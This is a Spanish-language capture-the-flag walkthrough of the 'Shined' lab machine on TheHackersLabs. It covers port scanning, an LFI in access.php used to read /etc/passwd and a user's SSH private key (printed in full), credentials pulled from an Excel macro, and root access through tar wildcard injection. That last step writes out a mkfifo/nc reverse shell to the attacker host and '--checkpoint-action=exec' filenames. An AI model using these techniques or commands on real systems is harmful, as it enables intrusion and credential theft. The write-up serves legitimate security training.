Shined es una de las maquinas existentes actualmente en la plataforma de hacking Thehackerslabs y es de dificultad Avanzado.
En este caso se trata de una máquina basada en el Sistema Operativo Linux.
Empezaremos con el escaneo de puertos una vez tenemos la ip que tiene la maquina a vulnerar, que en mi caso será la 192.168.0.101
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
┌──(kali㉿kali)-[~] └─$ sudo nmap -sS -p- --open --min-rate 5000 -vvv -n 192.168.0.101 [sudo] password for kali: Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-20 11:58 CEST Initiating ARP Ping Scan at 11:58 Scanning 192.168.0.101 [1 port] Completed ARP Ping Scan at 11:58, 0.05s elapsed (1 total hosts) Initiating SYN Stealth Scan at 11:58 Scanning 192.168.0.101 [65535 ports] Discovered open port 22/tcp on 192.168.0.101 Discovered open port 80/tcp on 192.168.0.101 Discovered open port 2222/tcp on 192.168.0.101 Completed SYN Stealth Scan at 11:58, 2.89s elapsed (65535 total ports) Nmap scan report for 192.168.0.101 Host is up, received arp-response (0.00024s latency). Scanned at 2024-04-20 11:58:53 CEST for 3s Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 64 80/tcp open http syn-ack ttl 63 2222/tcp open EtherNetIP-1 syn-ack ttl 63 MAC Address: 08:00:27:4A:FC:5C (Oracle VirtualBox virtual NIC) Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 3.07 seconds Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB) |
Teniendo claro que los puertos abiertos son los 22 , 80 y 2222, ejecutaremos con nmap indicándole que también use los scripts básicos para los puertos.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
┌──(kali㉿kali)-[~] └─$ sudo nmap -sCV -p22,2222,80 192.168.0.101 Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-20 11:59 CEST Nmap scan report for shinedagain.lan (192.168.0.101) Host is up (0.00074s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 8d:9c:0e:58:72:31:a2:f9:81:15:34:9a:e7:07:f1:2a (ECDSA) |_ 256 d8:05:cc:bd:07:3b:c8:59:eb:5e:cd:ee:6e:52:c6:ab (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-title: sungla |_http-server-header: Apache/2.4.52 (Ubuntu) 2222/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 09:20:97:b6:90:27:34:c4:f4:ed:35:c0:66:a3:f8:02 (ECDSA) |_ 256 a5:bc:e0:59:79:1e:b7:5f:93:65:b1:2f:0c:bb:b0:66 (ED25519) MAC Address: 08:00:27:4A:FC:5C (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.16 seconds |
Entramos por el puerto 80 y veremos la siguiente web, pero tras revisarla manualmente no nos llevará a nada así que pasaremos a la búsqueda de carpeta u archivos que puedan ayudarnos.

Usaremos feroxbuster para el escaneo con la siguiente sintaxis:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
└─$ feroxbuster --url http://192.168.0.101-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben "epi" Risher 🤓 ver: 2.10.1 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://192.168.0.101 🚀 Threads │ 50 📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 👌 Status Codes │ All Status Codes! 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.10.1 💉 Config File │ /etc/feroxbuster/ferox-config.toml 🔎 Extract Links │ true 💲 Extensions │ [php] 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 403 GET 9l 28w 277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 404 GET 9l 31w 274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 301 GET 9l 28w 313c http://192.168.0.101/images => http://192.168.0.101/images/ 200 GET 5l 42w 1998c http://192.168.0.101/images/about_right_cross.jpg 200 GET 125l 690w 51789c http://192.168.0.101/images/glass1.png 200 GET 3l 40w 1030c http://192.168.0.101/images/menu_icon.png 200 GET 65l 433w 35028c http://192.168.0.101/images/glass5.png 200 GET 242l 1313w 65160c http://192.168.0.101/images/loading.gif 301 GET 9l 28w 310c http://192.168.0.101/css => http://192.168.0.101/css/ 200 GET 839l 1504w 15797c http://192.168.0.101/css/style.css 200 GET 774l 4767w 383367c http://192.168.0.101/images/banner_img.png 200 GET 63l 129w 1849c http://192.168.0.101/access.php |
Y lo que nos resulta llamativo es el access.php, así que accedemos para ver que muestra.

Lo primero que intentamos es usar los usuarios/contraseñas por defecto como por ejemplo:
admin:admin
admin:password
admin:passw0rd
Pero ninguna va y lo extraño es que tampoco devuelve ningún mensaje de contraseña incorrecta o usuario incorrecto, cosa que nos hace sospechar de un posible rabbit hole.
Aun asi, vamos a ver si el código de la pagina nos resuelve algo.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
<body> <div class="login-container"> <h2>Iniciar Sesión</h2> <form action="#" method="post"> <input type="text" name="username" placeholder="Usuario" required> <input type="password" name="password" placeholder="Contraseña" required> <input type="submit" value="Iniciar Sesión"> </form> </div> <div> </div> </body> |
Podemos ver que el form action lo dirige a # , lo cual es la misma pagina pero extraño, así que probamos a lanzar un sqlmap pero sin éxito, por lo que pasaremos a fuzzear si esta contiene algún parámetro para un posible lfi.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
┌──(kali㉿kali)-[~] └─$ wfuzz --hh=1845 -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://192.168.0.101/access.php?FUZZ=../../../../../../etc/passwd" /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://192.168.0.101/access.php?FUZZ=../../../../../../etc/passwd Total requests: 220560 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000003976: 200 88 L 164 W 3164 Ch "inet" Total time: 21.96175 Processed Requests: 4844 Filtered Requests: 4843 Requests/sec.: 220.5652 |
Y encontramos el parametro inet, por lo que probamos a mirar passwd para ver los usuario en el sistema
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
┌──(kali㉿kali)-[~] └─$ curl "192.168.0.101/access.php?inet=../../../../../../../etc/passwd" root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:104::/nonexistent:/usr/sbin/nologin systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin cifra:x:1000:1000:,,,:/home/cifra:/bin/bash </div> </body> </html> |
Anotamos el usuario cifra para poder mirar la id_rsa entre otras archivos principales.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 |
┌──(kali㉿kali)-[~] └─$ curl "192.168.0.101/access.php?inet=../../../../../../../home/cifra/.ssh/id_rsa" -----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY----- |
Teniendo ya la id_rsa y el usuario, nos la copiamos a nuestra maquina kali, le damos permisos 600 y nos conectamos pero..
|
1 2 3 4 5 6 7 8 |
┌──(kali㉿kali)-[~] └─$ ssh -i id_rsa cifra@192.168.0.101 cifra@192.168.0.101's password: Permission denied, please try again. cifra@192.168.0.101's password: Permission denied, please try again. cifra@192.168.0.101's password: cifra@192.168.0.101: Permission denied (publickey,password). |
¿Por que no nos valida la id_rsa? ¿ es de otro usuario? Bueno, recordemos que tenemos otro puerto para ssh como es el 2222
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
──(kali㉿kali)-[~/shine] └─$ ssh -i id_rsa cifra@192.168.0.101 -p2222 The authenticity of host '[192.168.0.101]:2222 ([192.168.0.101]:2222)' can't be established. ED25519 key fingerprint is SHA256:rpq/IGJ60HZMEXbZDq1zSx9/6CKFJTOTyb3ubKwwu3Y. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[192.168.0.101]:2222' (ED25519) to the list of known hosts. Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro This system has been minimized by removing packages and content that are not required on a system that users do not log into. To restore this content, you can run the 'unminimize' command. Last login: Tue Apr 9 13:53:46 2024 from 192.168.1.210 cifra@b13d359bc30b:~$ |
Dentro! pero , donde estamos? por el nombre de la maquina ya podemos pensar que no es la maquina real sino un docker…
Miramos que tenemos en el directorio del usuario y esto es lo único que vemos, ni flag ni nada de momento.
|
1 2 3 4 |
cifra@b13d359bc30b:~$ pwd;ls -ltr /home/cifra total 16 -rw-r--r-- 1 root root 13315 Apr 8 12:00 contabilidad.xlsm |
Recordemos que la extensión xlsm es un formato de archivo utilizado por Microsoft Excel para almacenar hojas de cálculo con macros y si queremos investigar mas en él , nos lo pasaremos a nuestra maquina de la siguiente manera:
|
1 2 |
cifra@b13d359bc30b:~$ cat contabilidad.xlsm |base64 -w0;echo UEsDBBQABgAIAAAAIQCsmTVRbwEAAD8EAAATAAgCW0NvbnRlbnRfVHlwZXNdLnhtbCCiBAIooAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
Lo decodificaremos en nuestra maquina para devolverlo a su formato
|
1 2 |
┌──(kali㉿kali)-[~] └─$ echo "UE...................." |base64 -d -w0 > contabilidad.xlsm |
Ahora para poder abrir el fichero, tenemos dos opciones:
1- Descomprimir el fichero y mirar en el de macros

2- Usar el comando olevba
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
┌──(kali㉿kali)-[~] └─$ olevba contab.xslm --decode --reveal --detailed --deobf XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel) olevba 0.60.1 on Python 3.11.5 - http://decalage.info/python/oletools =============================================================================== FILE: contab.xslm Type: OpenXML WARNING invalid value for PROJECTLCID_Id expected 0002 got 004A WARNING invalid value for PROJECTLCID_Lcid expected 0409 got 0005 WARNING invalid value for PROJECTLCIDINVOKE_Id expected 0014 got 0002 WARNING invalid value for PROJECTCODEPAGE_Id expected 0003 got 0014 WARNING invalid value for PROJECTCODEPAGE_Size expected 0002 got 0004 WARNING invalid value for PROJECTNAME_Id expected 0004 got 0000 ERROR PROJECTNAME_SizeOfProjectName value not in range [1-128]: 131075 ERROR Error in _extract_vba Traceback (most recent call last): ------------------------------------------------------------------------------- VBA MACRO Módulo2 in file: xl/vbaProject.bin - OLE stream: 'Módulo2' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub Macro1() Attribute Macro1.VB_Description = "leopoldo:snickers" Attribute Macro1.VB_ProcData.VB_Invoke_Func = " \n14" ' ' Macro1 Macro ' leopoldo:snickers |
Y nos encontramos en ambos casos a un usuario con lo que parece su contraseña
leopoldo:snickers
Será un usuario de… quizás la maquina real? En este caso usaremos el puerto por defecto.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
┌──(kali㉿kali)-[~] └─$ ssh leopoldo@192.168.0.101 leopoldo@192.168.0.101's password: Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro System information as of Wed Apr 10 09:13:00 PM UTC 2024 System load: 0.0 Processes: 123 Usage of /: 58.5% of 11.21GB Users logged in: 0 Memory usage: 13% IPv4 address for docker0: 172.17.0.1 Swap usage: 0% IPv4 address for enp0s3: 192.168.0.101 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s just raised the bar for easy, resilient and secure K8s cluster deployment. https://ubuntu.com/engage/secure-kubernetes-at-the-edge Expanded Security Maintenance for Applications is not enabled. 38 updates can be applied immediately. 20 of these updates are standard security updates. To see these additional updates run: apt list --upgradable Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status Last login: Wed Apr 10 15:33:23 2024 from 192.168.0.160 leopoldo@shined:~$ |
Una vez dentro ya vemos la flag de user.txt
|
1 2 3 4 5 6 |
leopoldo@shined:~$ ls -ltr total 16 drwxrwxr-x 2 leopoldo leopoldo 4096 Apr 7 17:39 Documents drwxrwxr-x 2 leopoldo leopoldo 4096 Apr 7 17:39 Downloads drwxrwxr-x 3 leopoldo leopoldo 4096 Apr 7 17:39 Desktop -rw-rw-r-- 1 leopoldo leopoldo 33 Apr 7 18:32 user.txt |
Antes de usar herramientas como linpeas, haremos una búsqueda manual de lo típico que podemos mirar como sudo -l, /opt/, caps, /tmp , etc y vemos que en /tmp existe un archivo llamado backup.sh con el siguiente contenido:
|
1 2 3 4 5 |
leopoldo@shined:~/Desktop/scripts$ cat /tmp/backup.sh #!/bin/bash cd /home/leopoldo/Desktop/scripts/ tar -zcf /home/leopoldo/Desktop/scripts/backup.tgz * |
Damos por hecho que esto es algun tipo de tarea programada, pero aun asi usamos pspy y vemos lo siguiente:

Por otras maquinas ya sabemos que peligro tiene un tar con un wildcard asi que vamos a explotarlo. ( Link )
|
1 2 3 4 5 6 |
leopoldo@shined:~/Desktop/scripts$ cd /home/leopoldo/Desktop/scripts leopoldo@shined:~/Desktop/scripts$ echo "mkfifo /tmp/lhennp; nc 192.168.0.160 4444 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh leopoldo@shined:~/Desktop/scripts$ echo "" > "--checkpoint-action=exec=sh shell.sh" leopoldo@shined:~/Desktop/scripts$ echo "" > --checkpoint=1 leopoldo@shined:~/Desktop/scripts$ tar cf archive.tar * leopoldo@shined:~/Desktop/scripts$ |
Solo nos tocará ponernos a la escucha en el puerto 4444 y esperar a que se ejecute.

Y recibimos la shell
|
1 2 3 4 5 6 7 8 9 10 11 |
┌──(root㉿kali)-[/home/kali] └─# nc -nvlp 4444 listening on [any] 4444 ... connect to [192.168.0.160] from (UNKNOWN) [192.168.0.101] 57884 id uid=0(root) gid=0(root) groups=0(root) cd /root pwd;ls /root root.txt snap |
Y somos root!
Ahora ya por saber como se estaba ejecutando por detrás, miramos el cron propio del usuario root que es donde están configuradas las tareas.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
cat /var/spool/cron/crontabs/root # DO NOT EDIT THIS FILE - edit the master and reinstall. # (/tmp/crontab.NdEq6o/crontab installed on Tue Apr 9 11:14:05 2024) # (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $) # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hour (h), day of month (dom), month (mon), # and day of week (dow) or use '*' in these fields (for 'any'). # # Notice that tasks will be started based on the cron's system # daemon's notion of time and timezones. # # Output of the crontab jobs (including errors) is sent through # email to the user the crontab file belongs to (unless redirected). # # For example, you can run a backup of all your user accounts # at 5 a.m every week with: # 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/ # # For more information see the manual pages of crontab(5) and cron(8) # # m h dom mon dow command * * * * * /bin/bash /tmp/backup.sh @reboot /tmp/clean.sh |
Hasta aquí la maquina Shined de la plataforma Thehackerslabs









